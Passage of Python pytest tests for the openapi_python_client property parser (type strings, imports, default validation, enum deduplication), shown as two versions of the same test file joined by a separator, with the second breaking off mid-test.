assert p.get_imports(prefix="") == {
"from datetime import datetime",
"from typing import cast",
}
p.required = False
assert p.get_imports(prefix="") == {
"from typing import Optional",
"from datetime import datetime",
"from typing import cast",
}
class TestDateProperty:
def test_get_imports(self, mocker):
from openapi_python_client.parser.properties import DateProperty
name = mocker.MagicMock()
mocker.patch("openapi_python_client.utils.snake_case")
p = DateProperty(name=name, required=True, default=None)
assert p.get_imports(prefix="") == {
"from datetime import date",
"from typing import cast",
}
p.required = False
assert p.get_imports(prefix="") == {
"from typing import Optional",
"from datetime import date",
"from typing import cast",
}
class TestFileProperty:
def test_get_imports(self, mocker):
from openapi_python_client.parser.properties import FileProperty
name = mocker.MagicMock()
mocker.patch("openapi_python_client.utils.snake_case")
prefix = "blah"
p = FileProperty(name=name, required=True, default=None)
assert p.get_imports(prefix=prefix) == {f"from {prefix}.types import File", "from dataclasses import astuple"}
p.required = False
assert p.get_imports(prefix=prefix) == {
"from typing import Optional",
f"from {prefix}.types import File",
"from dataclasses import astuple",
}
class TestListProperty:
def test_get_type_string(self, mocker):
from openapi_python_client.parser.properties import ListProperty
inner_property = mocker.MagicMock()
inner_type_string = mocker.MagicMock()
inner_property.get_type_string.return_value = inner_type_string
p = ListProperty(name="test", required=True, default=None, inner_property=inner_property)
assert p.get_type_string() == f"List[{inner_type_string}]"
p.required = False
assert p.get_type_string() == f"Optional[List[{inner_type_string}]]"
p = ListProperty(name="test", required=True, default=[], inner_property=inner_property)
assert p.default == f"field(default_factory=lambda: cast(List[{inner_type_string}], []))"
def test_get_type_imports(self, mocker):
from openapi_python_client.parser.properties import ListProperty
inner_property = mocker.MagicMock()
inner_import = mocker.MagicMock()
inner_property.get_imports.return_value = {inner_import}
prefix = mocker.MagicMock()
p = ListProperty(name="test", required=True, default=None, inner_property=inner_property)
assert p.get_imports(prefix=prefix) == {
inner_import,
"from typing import List",
}
p.required = False
assert p.get_imports(prefix=prefix) == {
inner_import,
"from typing import List",
"from typing import Optional",
}
p.default = mocker.MagicMock()
assert p.get_imports(prefix=prefix) == {
inner_import,
"from typing import Optional",
"from typing import List",
"from typing import cast",
"from dataclasses import field",
}
class TestUnionProperty:
def test_get_type_string(self, mocker):
from openapi_python_client.parser.properties import UnionProperty
inner_property_1 = mocker.MagicMock()
inner_property_1.get_type_string.return_value = "inner_type_string_1"
inner_property_2 = mocker.MagicMock()
inner_property_2.get_type_string.return_value = "inner_type_string_2"
p = UnionProperty(
name="test", required=True, default=None, inner_properties=[inner_property_1, inner_property_2]
)
assert p.get_type_string() == "Union[inner_type_string_1, inner_type_string_2]"
p.required = False
assert p.get_type_string() == "Optional[Union[inner_type_string_1, inner_type_string_2]]"
def test_get_type_imports(self, mocker):
from openapi_python_client.parser.properties import UnionProperty
inner_property_1 = mocker.MagicMock()
inner_import_1 = mocker.MagicMock()
inner_property_1.get_imports.return_value = {inner_import_1}
inner_property_2 = mocker.MagicMock()
inner_import_2 = mocker.MagicMock()
inner_property_2.get_imports.return_value = {inner_import_2}
prefix = mocker.MagicMock()
p = UnionProperty(
name="test", required=True, default=None, inner_properties=[inner_property_1, inner_property_2]
)
assert p.get_imports(prefix=prefix) == {
inner_import_1,
inner_import_2,
"from typing import Union",
}
p.required = False
assert p.get_imports(prefix=prefix) == {
inner_import_1,
inner_import_2,
"from typing import Union",
"from typing import Optional",
}
class TestEnumProperty:
def test___post_init__(self, mocker):
name = mocker.MagicMock()
snake_case = mocker.patch("openapi_python_client.utils.snake_case")
fake_reference = mocker.MagicMock(class_name="MyTestEnum")
deduped_reference = mocker.MagicMock(class_name="Deduped")
from_ref = mocker.patch(
f"{MODULE_NAME}.Reference.from_ref", side_effect=[fake_reference, deduped_reference, deduped_reference]
)
from openapi_python_client.parser import properties
fake_dup_enum = mocker.MagicMock()
properties._existing_enums = {"MyTestEnum": fake_dup_enum}
values = {"FIRST": "first", "SECOND": "second"}
enum_property = properties.EnumProperty(
name=name, required=True, default="second", values=values, title="a_title",
)
assert enum_property.default == "Deduped.SECOND"
assert enum_property.python_name == snake_case(name)
from_ref.assert_has_calls([mocker.call("a_title"), mocker.call("MyTestEnum1")])
assert enum_property.reference == deduped_reference
assert properties._existing_enums == {"MyTestEnum": fake_dup_enum, "Deduped": enum_property}
# Test encountering exactly the same Enum again
assert (
properties.EnumProperty(name=name, required=True, default="second", values=values, title="a_title",)
== enum_property
)
assert properties._existing_enums == {"MyTestEnum": fake_dup_enum, "Deduped": enum_property}
# What if an Enum exists with the same name, but has the same values? Don't dedupe that.
fake_dup_enum.values = values
from_ref.reset_mock()
from_ref.side_effect = [fake_reference]
enum_property = properties.EnumProperty(
name=name, required=True, default="second", values=values, title="a_title",
)
assert enum_property.default == "MyTestEnum.SECOND"
assert enum_property.python_name == snake_case(name)
from_ref.assert_called_once_with("a_title")
assert enum_property.reference == fake_reference
assert len(properties._existing_enums) == 2
properties._existing_enums = {}
def test_get_type_string(self, mocker):
fake_reference = mocker.MagicMock(class_name="MyTestEnum")
mocker.patch(f"{MODULE_NAME}.Reference.from_ref", return_value=fake_reference)
from openapi_python_client.parser import properties
enum_property = properties.EnumProperty(name="test", required=True, default=None, values={}, title="a_title")
assert enum_property.get_type_string() == "MyTestEnum"
enum_property.required = False
assert enum_property.get_type_string() == "Optional[MyTestEnum]"
properties._existing_enums = {}
def test_get_imports(self, mocker):
fake_reference = mocker.MagicMock(class_name="MyTestEnum", module_name="my_test_enum")
mocker.patch(f"{MODULE_NAME}.Reference.from_ref", return_value=fake_reference)
prefix = mocker.MagicMock()
from openapi_python_client.parser import properties
enum_property = properties.EnumProperty(name="test", required=True, default=None, values={}, title="a_title")
assert enum_property.get_imports(prefix=prefix) == {
f"from {prefix}.{fake_reference.module_name} import {fake_reference.class_name}"
}
enum_property.required = False
assert enum_property.get_imports(prefix=prefix) == {
f"from {prefix}.{fake_reference.module_name} import {fake_reference.class_name}",
"from typing import Optional",
}
properties._existing_enums = {}
def test_values_from_list(self):
from openapi_python_client.parser.properties import EnumProperty
data = ["abc", "123", "a23", "1bc"]
result = EnumProperty.values_from_list(data)
assert result == {
"ABC": "abc",
"VALUE_1": "123",
"A23": "a23",
"VALUE_3": "1bc",
}
def test_values_from_list_duplicate(self):
from openapi_python_client.parser.properties import EnumProperty
data = ["abc", "123", "a23", "abc"]
with pytest.raises(ValueError):
EnumProperty.values_from_list(data)
def test_get_all_enums(self, mocker):
from openapi_python_client.parser import properties
properties._existing_enums = mocker.MagicMock()
assert properties.EnumProperty.get_all_enums() == properties._existing_enums
properties._existing_enums = {}
def test_get_enum(self):
from openapi_python_client.parser import properties
properties._existing_enums = {"test": "an enum"}
assert properties.EnumProperty.get_enum("test") == "an enum"
properties._existing_enums = {}
class TestRefProperty:
def test_template(self, mocker):
from openapi_python_client.parser.properties import RefProperty
ref_property = RefProperty(
name="test", required=True, default=None, reference=mocker.MagicMock(class_name="MyRefClass")
)
assert ref_property.template == "ref_property.pyi"
mocker.patch(f"{MODULE_NAME}.EnumProperty.get_enum", return_value="an enum")
assert ref_property.template == "enum_property.pyi"
def test_get_type_string(self, mocker):
from openapi_python_client.parser.properties import RefProperty
ref_property = RefProperty(
name="test", required=True, default=None, reference=mocker.MagicMock(class_name="MyRefClass")
)
assert ref_property.get_type_string() == "MyRefClass"
ref_property.required = False
assert ref_property.get_type_string() == "Optional[MyRefClass]"
def test_get_imports(self, mocker):
fake_reference = mocker.MagicMock(class_name="MyRefClass", module_name="my_test_enum")
prefix = mocker.MagicMock()
from openapi_python_client.parser.properties import RefProperty
p = RefProperty(name="test", required=True, default=None, reference=fake_reference)
assert p.get_imports(prefix=prefix) == {
f"from {prefix}.{fake_reference.module_name} import {fake_reference.class_name}",
"from typing import Dict",
"from typing import cast",
}
p.required = False
assert p.get_imports(prefix=prefix) == {
f"from {prefix}.{fake_reference.module_name} import {fake_reference.class_name}",
"from typing import Dict",
"from typing import cast",
"from typing import Optional",
}
class TestDictProperty:
def test___post_init__(self):
from openapi_python_client.parser.properties import DictProperty
p = DictProperty(name="blah", required=True, default={})
assert p.default == "field(default_factory=lambda: cast(Dict[Any, Any], {}))"
def test_get_imports(self, mocker):
from openapi_python_client.parser.properties import DictProperty
name = mocker.MagicMock()
mocker.patch("openapi_python_client.utils.snake_case")
prefix = mocker.MagicMock()
p = DictProperty(name=name, required=True, default=None)
assert p.get_imports(prefix=prefix) == {
"from typing import Dict",
}
p.required = False
assert p.get_imports(prefix=prefix) == {
"from typing import Optional",
"from typing import Dict",
}
p.default = mocker.MagicMock()
assert p.get_imports(prefix=prefix) == {
"from typing import Optional",
"from typing import Dict",
"from typing import cast",
"from dataclasses import field",
}
class TestPropertyFromData:
def test_property_from_data_enum(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = mocker.MagicMock(title=None)
EnumProperty = mocker.patch(f"{MODULE_NAME}.EnumProperty")
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
EnumProperty.values_from_list.assert_called_once_with(data.enum)
EnumProperty.assert_called_once_with(
name=name, required=required, values=EnumProperty.values_from_list(), default=data.default, title=name
)
assert p == EnumProperty()
EnumProperty.reset_mock()
data.title = mocker.MagicMock()
property_from_data(
name=name, required=required, data=data,
)
EnumProperty.assert_called_once_with(
name=name, required=required, values=EnumProperty.values_from_list(), default=data.default, title=data.title
)
def test_property_from_data_ref(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Reference.construct(ref=mocker.MagicMock())
from_ref = mocker.patch(f"{MODULE_NAME}.Reference.from_ref")
RefProperty = mocker.patch(f"{MODULE_NAME}.RefProperty")
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
from_ref.assert_called_once_with(data.ref)
RefProperty.assert_called_once_with(name=name, required=required, reference=from_ref(), default=None)
assert p == RefProperty()
def test_property_from_data_string(self, mocker):
_string_based_property = mocker.patch(f"{MODULE_NAME}._string_based_property")
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type="string")
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
assert p == _string_based_property.return_value
_string_based_property.assert_called_once_with(name=name, required=required, data=data)
@pytest.mark.parametrize(
"openapi_type,python_type",
[
("number", "FloatProperty"),
("integer", "IntProperty"),
("boolean", "BooleanProperty"),
("object", "DictProperty"),
],
)
def test_property_from_data_simple_types(self, mocker, openapi_type, python_type):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type=openapi_type)
clazz = mocker.patch(f"{MODULE_NAME}.{python_type}")
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
clazz.assert_called_once_with(name=name, required=required, default=None)
assert p == clazz()
# Test optional values
clazz.reset_mock()
data.default = mocker.MagicMock()
property_from_data(
name=name, required=required, data=data,
)
clazz.assert_called_once_with(name=name, required=required, default=data.default)
def test_property_from_data_array(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema(type="array", items={"type": "number", "default": "0.0"},)
ListProperty = mocker.patch(f"{MODULE_NAME}.ListProperty")
FloatProperty = mocker.patch(f"{MODULE_NAME}.FloatProperty")
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
FloatProperty.assert_called_once_with(name=f"{name}_item", required=True, default="0.0")
ListProperty.assert_called_once_with(
name=name, required=required, default=None, inner_property=FloatProperty.return_value
)
assert p == ListProperty.return_value
def test_property_from_data_array_no_items(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema(type="array")
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
assert p == PropertyError(data=data, detail="type array must have items defined")
def test_property_from_data_array_invalid_items(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema(type="array", items={},)
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
assert p == PropertyError(data=oai.Schema(), detail=f"invalid data in items of array {name}")
def test_property_from_data_union(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema(anyOf=[{"type": "number", "default": "0.0"}, {"type": "integer", "default": "0"},])
UnionProperty = mocker.patch(f"{MODULE_NAME}.UnionProperty")
FloatProperty = mocker.patch(f"{MODULE_NAME}.FloatProperty")
IntProperty = mocker.patch(f"{MODULE_NAME}.IntProperty")
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
FloatProperty.assert_called_once_with(name=name, required=required, default="0.0")
IntProperty.assert_called_once_with(name=name, required=required, default="0")
UnionProperty.assert_called_once_with(
name=name,
required=required,
default=None,
inner_properties=[FloatProperty.return_value, IntProperty.return_value],
)
assert p == UnionProperty.return_value
def test_property_from_data_union_bad_type(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema(anyOf=[{}])
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
assert p == PropertyError(detail=f"Invalid property in union {name}", data=oai.Schema())
def test_property_from_data_unsupported_type(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type=mocker.MagicMock())
from openapi_python_client.parser.errors import PropertyError
from openapi_python_client.parser.properties import property_from_data
assert property_from_data(name=name, required=required, data=data) == PropertyError(
data=data, detail=f"unknown type {data.type}"
)
def test_property_from_data_no_valid_props_in_data(self):
from openapi_python_client.parser.errors import PropertyError
from openapi_python_client.parser.properties import property_from_data
data = oai.Schema()
assert property_from_data(name="blah", required=True, data=data) == PropertyError(
data=data, detail="Schemas must either have one of enum, anyOf, or type defined."
)
class TestStringBasedProperty:
def test__string_based_property_no_format(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type="string")
StringProperty = mocker.patch(f"{MODULE_NAME}.StringProperty")
from openapi_python_client.parser.properties import _string_based_property
p = _string_based_property(name=name, required=required, data=data)
StringProperty.assert_called_once_with(name=name, required=required, pattern=None, default=None)
assert p == StringProperty.return_value
# Test optional values
StringProperty.reset_mock()
data.default = mocker.MagicMock()
data.pattern = mocker.MagicMock()
_string_based_property(
name=name, required=required, data=data,
)
StringProperty.assert_called_once_with(name=name, required=required, pattern=data.pattern, default=data.default)
def test__string_based_property_datetime_format(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type="string", schema_format="date-time")
DateTimeProperty = mocker.patch(f"{MODULE_NAME}.DateTimeProperty")
from openapi_python_client.parser.properties import _string_based_property
p = _string_based_property(name=name, required=required, data=data)
DateTimeProperty.assert_called_once_with(name=name, required=required, default=None)
assert p == DateTimeProperty.return_value
# Test optional values
DateTimeProperty.reset_mock()
data.default = mocker.MagicMock()
_string_based_property(
name=name, required=required, data=data,
)
DateTimeProperty.assert_called_once_with(name=name, required=required, default=data.default)
def test__string_based_property_date_format(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type="string", schema_format="date")
DateProperty = mocker.patch(f"{MODULE_NAME}.DateProperty")
from openapi_python_client.parser.properties import _string_based_property
p = _string_based_property(name=name, required=required, data=data)
DateProperty.assert_called_once_with(name=name, required=required, default=None)
assert p == DateProperty.return_value
# Test optional values
DateProperty.reset_mock()
data.default = mocker.MagicMock()
_string_based_property(
name=name, required=required, data=data,
)
DateProperty.assert_called_once_with(name=name, required=required, default=data.default)
def test__string_based_property_binary_format(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type="string", schema_format="binary")
FileProperty = mocker.patch(f"{MODULE_NAME}.FileProperty")
from openapi_python_client.parser.properties import _string_based_property
p = _string_based_property(name=name, required=required, data=data)
FileProperty.assert_called_once_with(name=name, required=required, default=None)
assert p == FileProperty.return_value
# Test optional values
FileProperty.reset_mock()
data.default = mocker.MagicMock()
_string_based_property(
name=name, required=required, data=data,
)
FileProperty.assert_called_once_with(name=name, required=required, default=data.default)
def test__string_based_property_unsupported_format(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type="string", schema_format=mocker.MagicMock())
StringProperty = mocker.patch(f"{MODULE_NAME}.StringProperty")
from openapi_python_client.parser.properties import _string_based_property
p = _string_based_property(name=name, required=required, data=data)
StringProperty.assert_called_once_with(name=name, required=required, pattern=None, default=None)
assert p == StringProperty.return_value
# Test optional values
StringProperty.reset_mock()
data.default = mocker.MagicMock()
data.pattern = mocker.MagicMock()
_string_based_property(
name=name, required=required, data=data,
)
StringProperty.assert_called_once_with(name=name, required=required, pattern=data.pattern, default=data.default)
| from datetime import date, datetime
import pytest
import openapi_python_client.schema as oai
from openapi_python_client.parser.errors import PropertyError, ValidationError
from openapi_python_client.parser.reference import Reference
MODULE_NAME = "openapi_python_client.parser.properties"
class TestProperty:
def test___post_init(self, mocker):
from openapi_python_client.parser.properties import Property
validate_default = mocker.patch(f"{MODULE_NAME}.Property._validate_default")
Property(name="a name", required=True, default=None)
validate_default.assert_not_called()
Property(name="a name", required=True, default="the default value")
validate_default.assert_called_with(default="the default value")
def test_get_type_string(self):
from openapi_python_client.parser.properties import Property
p = Property(name="test", required=True, default=None)
p._type_string = "TestType"
assert p.get_type_string() == "TestType"
p.required = False
assert p.get_type_string() == "Optional[TestType]"
def test_to_string(self, mocker):
from openapi_python_client.parser.properties import Property
name = mocker.MagicMock()
snake_case = mocker.patch("openapi_python_client.utils.snake_case")
p = Property(name=name, required=True, default=None)
get_type_string = mocker.patch.object(p, "get_type_string")
assert p.to_string() == f"{snake_case(name)}: {get_type_string()}"
p.required = False
assert p.to_string() == f"{snake_case(name)}: {get_type_string()} = None"
p.default = "TEST"
assert p.to_string() == f"{snake_case(name)}: {get_type_string()} = TEST"
def test_get_imports(self, mocker):
from openapi_python_client.parser.properties import Property
name = mocker.MagicMock()
mocker.patch("openapi_python_client.utils.snake_case")
p = Property(name=name, required=True, default=None)
assert p.get_imports(prefix="") == set()
p.required = False
assert p.get_imports(prefix="") == {"from typing import Optional"}
def test__validate_default(self):
from openapi_python_client.parser.properties import Property
# should be okay if default isn't specified
p = Property(name="a name", required=True, default=None)
with pytest.raises(ValidationError):
p._validate_default("a default value")
with pytest.raises(ValidationError):
p = Property(name="a name", required=True, default="")
class TestStringProperty:
def test_get_type_string(self):
from openapi_python_client.parser.properties import StringProperty
p = StringProperty(name="test", required=True, default=None)
assert p.get_type_string() == "str"
p.required = False
assert p.get_type_string() == "Optional[str]"
def test__validate_default(self):
from openapi_python_client.parser.properties import StringProperty
p = StringProperty(name="a name", required=True, default="the default value")
assert p.default == '"the default value"'
class TestDateTimeProperty:
def test_get_imports(self, mocker):
from openapi_python_client.parser.properties import DateTimeProperty
name = mocker.MagicMock()
mocker.patch("openapi_python_client.utils.snake_case")
p = DateTimeProperty(name=name, required=True, default=None)
assert p.get_imports(prefix="") == {
"import datetime",
"from typing import cast",
}
p.required = False
assert p.get_imports(prefix="") == {
"from typing import Optional",
"import datetime",
"from typing import cast",
}
def test__validate_default(self):
from openapi_python_client.parser.properties import DateTimeProperty
with pytest.raises(ValidationError):
p = DateTimeProperty(name="a name", required=True, default="not a datetime")
p = DateTimeProperty(name="a name", required=True, default="2017-07-21T17:32:28Z")
assert p.default == "datetime.datetime(2017, 7, 21, 17, 32, 28, tzinfo=datetime.timezone.utc)"
class TestDateProperty:
def test_get_imports(self, mocker):
from openapi_python_client.parser.properties import DateProperty
name = mocker.MagicMock()
mocker.patch("openapi_python_client.utils.snake_case")
p = DateProperty(name=name, required=True, default=None)
assert p.get_imports(prefix="") == {
"import datetime",
"from typing import cast",
}
p.required = False
assert p.get_imports(prefix="") == {
"from typing import Optional",
"import datetime",
"from typing import cast",
}
def test__validate_default(self):
from openapi_python_client.parser.properties import DateProperty
with pytest.raises(ValidationError):
p = DateProperty(name="a name", required=True, default="not a date")
p = DateProperty(name="a name", required=True, default="1010-10-10")
assert p.default == "datetime.date(1010, 10, 10)"
class TestFileProperty:
def test_get_imports(self, mocker):
from openapi_python_client.parser.properties import FileProperty
name = mocker.MagicMock()
mocker.patch("openapi_python_client.utils.snake_case")
prefix = "blah"
p = FileProperty(name=name, required=True, default=None)
assert p.get_imports(prefix=prefix) == {f"from {prefix}.types import File", "from dataclasses import astuple"}
p.required = False
assert p.get_imports(prefix=prefix) == {
"from typing import Optional",
f"from {prefix}.types import File",
"from dataclasses import astuple",
}
def test__validate_default(self):
from openapi_python_client.parser.properties import FileProperty
# should be okay if default isn't specified
p = FileProperty(name="a name", required=True, default=None)
with pytest.raises(ValidationError):
p = FileProperty(name="a name", required=True, default="")
class TestFloatProperty:
def test__validate_default(self):
from openapi_python_client.parser.properties import FloatProperty
# should be okay if default isn't specified
p = FloatProperty(name="a name", required=True, default=None)
p = FloatProperty(name="a name", required=True, default="123.123")
assert p.default == 123.123
with pytest.raises(ValidationError):
p = FloatProperty(name="a name", required=True, default="not a float")
class TestIntProperty:
def test__validate_default(self):
from openapi_python_client.parser.properties import IntProperty
# should be okay if default isn't specified
p = IntProperty(name="a name", required=True, default=None)
p = IntProperty(name="a name", required=True, default="123")
assert p.default == 123
with pytest.raises(ValidationError):
p = IntProperty(name="a name", required=True, default="not an int")
class TestBooleanProperty:
def test__validate_default(self):
from openapi_python_client.parser.properties import BooleanProperty
# should be okay if default isn't specified
p = BooleanProperty(name="a name", required=True, default=None)
p = BooleanProperty(name="a name", required=True, default="Literally anything will work")
assert p.default == True
class TestListProperty:
def test_get_type_string(self, mocker):
from openapi_python_client.parser.properties import ListProperty
inner_property = mocker.MagicMock()
inner_type_string = mocker.MagicMock()
inner_property.get_type_string.return_value = inner_type_string
p = ListProperty(name="test", required=True, default=None, inner_property=inner_property)
assert p.get_type_string() == f"List[{inner_type_string}]"
p.required = False
assert p.get_type_string() == f"Optional[List[{inner_type_string}]]"
p = ListProperty(name="test", required=True, default=[], inner_property=inner_property)
assert p.default == f"field(default_factory=lambda: cast(List[{inner_type_string}], []))"
def test_get_type_imports(self, mocker):
from openapi_python_client.parser.properties import ListProperty
inner_property = mocker.MagicMock()
inner_import = mocker.MagicMock()
inner_property.get_imports.return_value = {inner_import}
prefix = mocker.MagicMock()
p = ListProperty(name="test", required=True, default=None, inner_property=inner_property)
assert p.get_imports(prefix=prefix) == {
inner_import,
"from typing import List",
}
p.required = False
assert p.get_imports(prefix=prefix) == {
inner_import,
"from typing import List",
"from typing import Optional",
}
p.default = mocker.MagicMock()
assert p.get_imports(prefix=prefix) == {
inner_import,
"from typing import Optional",
"from typing import List",
"from typing import cast",
"from dataclasses import field",
}
def test__validate_default(self, mocker):
from openapi_python_client.parser.properties import ListProperty
inner_property = mocker.MagicMock()
inner_type_string = mocker.MagicMock()
inner_property.get_type_string.return_value = inner_type_string
inner_property._validate_default.return_value = "y"
p = ListProperty(name="a name", required=True, default=["x"], inner_property=inner_property)
assert p.default == f"field(default_factory=lambda: cast(List[{inner_type_string}], ['y']))"
with pytest.raises(ValidationError):
p = ListProperty(name="a name", required=True, default="x", inner_property=inner_property)
def test__validate_default_enum_items(self, mocker):
from openapi_python_client.parser.properties import ListProperty, RefProperty
inner_enum_property = mocker.MagicMock(spec=RefProperty)
inner_enum_property.get_type_string.return_value = "AnEnum"
inner_enum_property._validate_default.return_value = "AnEnum.val1"
p = ListProperty(name="a name", required=True, default=["val1"], inner_property=inner_enum_property)
assert p.default == f"field(default_factory=lambda: cast(List[AnEnum], [AnEnum.val1]))"
class TestUnionProperty:
def test_get_type_string(self, mocker):
from openapi_python_client.parser.properties import UnionProperty
inner_property_1 = mocker.MagicMock()
inner_property_1.get_type_string.return_value = "inner_type_string_1"
inner_property_2 = mocker.MagicMock()
inner_property_2.get_type_string.return_value = "inner_type_string_2"
p = UnionProperty(
name="test", required=True, default=None, inner_properties=[inner_property_1, inner_property_2]
)
assert p.get_type_string() == "Union[inner_type_string_1, inner_type_string_2]"
p.required = False
assert p.get_type_string() == "Optional[Union[inner_type_string_1, inner_type_string_2]]"
def test_get_type_imports(self, mocker):
from openapi_python_client.parser.properties import UnionProperty
inner_property_1 = mocker.MagicMock()
inner_import_1 = mocker.MagicMock()
inner_property_1.get_imports.return_value = {inner_import_1}
inner_property_2 = mocker.MagicMock()
inner_import_2 = mocker.MagicMock()
inner_property_2.get_imports.return_value = {inner_import_2}
prefix = mocker.MagicMock()
p = UnionProperty(
name="test", required=True, default=None, inner_properties=[inner_property_1, inner_property_2]
)
assert p.get_imports(prefix=prefix) == {
inner_import_1,
inner_import_2,
"from typing import Union",
}
p.required = False
assert p.get_imports(prefix=prefix) == {
inner_import_1,
inner_import_2,
"from typing import Union",
"from typing import Optional",
}
def test__validate_default(self, mocker):
from openapi_python_client.parser.properties import UnionProperty
inner_property_1 = mocker.MagicMock()
inner_property_1.get_type_string.return_value = "inner_type_string_1"
inner_property_1._validate_default.side_effect = ValidationError()
inner_property_2 = mocker.MagicMock()
inner_property_2.get_type_string.return_value = "inner_type_string_2"
inner_property_2._validate_default.return_value = "the default value"
p = UnionProperty(
name="test", required=True, default="a value", inner_properties=[inner_property_1, inner_property_2]
)
assert p.default == "the default value"
inner_property_2._validate_default.side_effect = ValidationError()
with pytest.raises(ValidationError):
p = UnionProperty(
name="test", required=True, default="a value", inner_properties=[inner_property_1, inner_property_2]
)
class TestEnumProperty:
def test___post_init__(self, mocker):
name = mocker.MagicMock()
snake_case = mocker.patch("openapi_python_client.utils.snake_case")
fake_reference = mocker.MagicMock(class_name="MyTestEnum")
deduped_reference = mocker.MagicMock(class_name="Deduped")
from_ref = mocker.patch(
f"{MODULE_NAME}.Reference.from_ref", side_effect=[fake_reference, deduped_reference, deduped_reference]
)
from openapi_python_client.parser import properties
fake_dup_enum = mocker.MagicMock()
properties._existing_enums = {"MyTestEnum": fake_dup_enum}
values = {"FIRST": "first", "SECOND": "second"}
enum_property = properties.EnumProperty(
name=name, required=True, default="second", values=values, title="a_title",
)
assert enum_property.default == "Deduped.SECOND"
assert enum_property.python_name == snake_case(name)
from_ref.assert_has_calls([mocker.call("a_title"), mocker.call("MyTestEnum1")])
assert enum_property.reference == deduped_reference
assert properties._existing_enums == {"MyTestEnum": fake_dup_enum, "Deduped": enum_property}
# Test encountering exactly the same Enum again
assert (
properties.EnumProperty(name=name, required=True, default="second", values=values, title="a_title",)
== enum_property
)
assert properties._existing_enums == {"MyTestEnum": fake_dup_enum, "Deduped": enum_property}
# What if an Enum exists with the same name, but has the same values? Don't dedupe that.
fake_dup_enum.values = values
from_ref.reset_mock()
from_ref.side_effect = [fake_reference]
enum_property = properties.EnumProperty(
name=name, required=True, default="second", values=values, title="a_title",
)
assert enum_property.default == "MyTestEnum.SECOND"
assert enum_property.python_name == snake_case(name)
from_ref.assert_called_once_with("a_title")
assert enum_property.reference == fake_reference
assert len(properties._existing_enums) == 2
properties._existing_enums = {}
def test_get_type_string(self, mocker):
fake_reference = mocker.MagicMock(class_name="MyTestEnum")
mocker.patch(f"{MODULE_NAME}.Reference.from_ref", return_value=fake_reference)
from openapi_python_client.parser import properties
enum_property = properties.EnumProperty(name="test", required=True, default=None, values={}, title="a_title")
assert enum_property.get_type_string() == "MyTestEnum"
enum_property.required = False
assert enum_property.get_type_string() == "Optional[MyTestEnum]"
properties._existing_enums = {}
def test_get_imports(self, mocker):
fake_reference = mocker.MagicMock(class_name="MyTestEnum", module_name="my_test_enum")
mocker.patch(f"{MODULE_NAME}.Reference.from_ref", return_value=fake_reference)
prefix = mocker.MagicMock()
from openapi_python_client.parser import properties
enum_property = properties.EnumProperty(name="test", required=True, default=None, values={}, title="a_title")
assert enum_property.get_imports(prefix=prefix) == {
f"from {prefix}.{fake_reference.module_name} import {fake_reference.class_name}"
}
enum_property.required = False
assert enum_property.get_imports(prefix=prefix) == {
f"from {prefix}.{fake_reference.module_name} import {fake_reference.class_name}",
"from typing import Optional",
}
properties._existing_enums = {}
def test_values_from_list(self):
from openapi_python_client.parser.properties import EnumProperty
data = ["abc", "123", "a23", "1bc"]
result = EnumProperty.values_from_list(data)
assert result == {
"ABC": "abc",
"VALUE_1": "123",
"A23": "a23",
"VALUE_3": "1bc",
}
def test_values_from_list_duplicate(self):
from openapi_python_client.parser.properties import EnumProperty
data = ["abc", "123", "a23", "abc"]
with pytest.raises(ValueError):
EnumProperty.values_from_list(data)
def test_get_all_enums(self, mocker):
from openapi_python_client.parser import properties
properties._existing_enums = mocker.MagicMock()
assert properties.EnumProperty.get_all_enums() == properties._existing_enums
properties._existing_enums = {}
def test_get_enum(self):
from openapi_python_client.parser import properties
properties._existing_enums = {"test": "an enum"}
assert properties.EnumProperty.get_enum("test") == "an enum"
properties._existing_enums = {}
def test__validate_default(self, mocker):
fake_reference = mocker.MagicMock(class_name="MyTestEnum", module_name="my_test_enum")
mocker.patch(f"{MODULE_NAME}.Reference.from_ref", return_value=fake_reference)
from openapi_python_client.parser import properties
enum_property = properties.EnumProperty(
name="test", required=True, default="test", values={"TEST": "test"}, title="a_title"
)
assert enum_property.default == "MyTestEnum.TEST"
with pytest.raises(ValidationError):
enum_property = properties.EnumProperty(
name="test", required=True, default="bad_val", values={"TEST": "test"}, title="a_title"
)
properties._existing_enums = {}
class TestRefProperty:
def test_template(self, mocker):
from openapi_python_client.parser.properties import RefProperty
ref_property = RefProperty(
name="test", required=True, default=None, reference=mocker.MagicMock(class_name="MyRefClass")
)
assert ref_property.template == "ref_property.pyi"
mocker.patch(f"{MODULE_NAME}.EnumProperty.get_enum", return_value="an enum")
assert ref_property.template == "enum_property.pyi"
def test_get_type_string(self, mocker):
from openapi_python_client.parser.properties import RefProperty
ref_property = RefProperty(
name="test", required=True, default=None, reference=mocker.MagicMock(class_name="MyRefClass")
)
